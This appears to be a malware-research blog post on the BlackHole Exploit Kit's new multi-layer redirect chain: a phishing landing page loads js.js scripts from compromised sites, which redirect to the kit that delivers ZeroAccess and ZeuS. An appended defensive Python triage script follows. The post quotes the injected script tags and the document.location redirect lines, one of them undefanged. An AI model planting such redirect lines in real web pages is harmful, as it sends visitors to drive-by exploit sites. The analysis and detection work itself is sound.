I looked at MDL today and suddenly discovered the following:
New method of BlackHole spreading. The js has the form:
document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';
ISC wrote about that, and that BlackHole spreads ZeroAccess/Sirefef now.
Further information from this note: http://isc.sans.edu/diary/Updates+on+ZeroAccess+and+BlackHole+front+/12079
So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.
BlackHole panel
The most common method used by BlackHole to spread is via links inside phishing emails.
For example:
1) Phishing email contains a link to a website
2) The website contains a redirection to a BH website
But recently they improved this method by adding another layer:
1) Phishing email contains a link to a website
2) The website contains four links like:
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"></script>
3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:
-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';
That makes it really easy for the author to update to new websites, and at the same time makes it harder for a takedown.
After that you already know what happens, it will check your system and select the best exploit for it, like a PDF exploit.
For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and Spyeye, but just recently it started to change...
That brings us to the second update: ZeroAccess
ZeroAccess is not something new... in fact it has been around for some years, but it is showing some very interesting development. One recent BH exploit kit is delivering a Downloader trojan. This downloader is then downloading two additional trojans, a ZeroAccess and a ZeuS trojan.
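As an added example (not from the post or the ISC diary), a small Python triage script that walks the chain described above: landing page, external js.js includes, and the document.location hop to a main.php?page=<16 hex> URL. All hostnames, the landing URL and the script contents are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed sample of the intermediary page (not a real capture).
LANDING_URL = "http://compromised-site.example/index.html"
LANDING_HTML = """<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="http://site-a.example/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="http://site-b.example/js.js"></script>
<script src="/local/app.js"></script>
"""

# Constructed contents of each fetched js.js: one performs the hop to the kit, one is benign.
FETCHED_JS = {
    "http://site-a.example/js.js": "document.location='http://ek-host.example/main.php?page=206133a43dda613f';",
    "http://site-b.example/js.js": "var loaded = true;",
}

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc=[\"']([^\"']+)[\"']", re.I)
REDIRECT_RE = re.compile(r"document\.location\s*=\s*[\"']([^\"']+)[\"']")
# Kit landing URL shape quoted in the post: main.php?page=<16 hex chars>
BH_LANDING_RE = re.compile(r"/main\.php\?page=[0-9a-f]{16}$")

def external_scripts(html, landing_url):
    """Return script src URLs hosted on a domain other than the landing page's own."""
    own_host = urlparse(landing_url).netloc.lower()
    srcs = SCRIPT_SRC_RE.findall(html)
    return [s for s in srcs if urlparse(s).netloc and urlparse(s).netloc.lower() != own_host]

def redirect_targets(js_text):
    """Return every document.location assignment target found in a script body."""
    return REDIRECT_RE.findall(js_text)

def triage(html, landing_url, fetched_js):
    """Walk landing page -> js.js -> redirect and report (script host, kit host) hops."""
    hops = []
    for src in external_scripts(html, landing_url):
        for target in redirect_targets(fetched_js.get(src, "")):
            if BH_LANDING_RE.search(target):
                hops.append((urlparse(src).netloc, urlparse(target).netloc))
    verdict = "suspected BlackHole redirect chain" if hops else "no BH redirect found"
    return {"hops": hops, "verdict": verdict}

if __name__ == "__main__":
    print(triage(LANDING_HTML, LANDING_URL, FETCHED_JS))
```

The two hostnames in each hop are the ones a defender would block or sinkhole: the intermediary js.js host, which the kit operator can rotate cheaply, and the final kit host.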